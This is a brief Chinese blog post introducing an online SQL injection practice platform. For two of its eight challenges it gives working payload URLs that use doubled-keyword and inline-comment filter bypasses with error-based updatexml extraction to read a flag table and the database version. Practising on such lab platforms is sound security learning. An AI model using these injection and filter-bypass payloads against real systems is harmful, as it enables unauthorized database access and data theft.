sqli练习游戏--Break This SQLi

Break This SQLi

国外的一个在线练习sql注入的平台,据介绍是作者实际遇到的一些有意思的情形。
地址:http://breakthisqli.rf.gd/
网上没有找到公开的wp,没有源码,难度还是有的。

Challenge 1

Challenge 2

http://breakthisqli.rf.gd/2/?id=2&name=users where id=3 uunionnion sselectelect 1,2,3,updatexml(1,(concat(0x7e,mid((sselectelect * from flag limit 0,1),1,1))),1);%00

Challenge 3

Challenge 4

http://breakthisqli.rf.gd/4/?id=2&name=users/**/uunionnion/**/sselectelect/**/1,2,3,/*!updatexml*/(1,/*!concat*/(0x7e,/*!select*//**//*!version*/()),1);%00

Challenge 5

Challenge 6

Challenge 7

Challenge 8

标签: none

添加新评论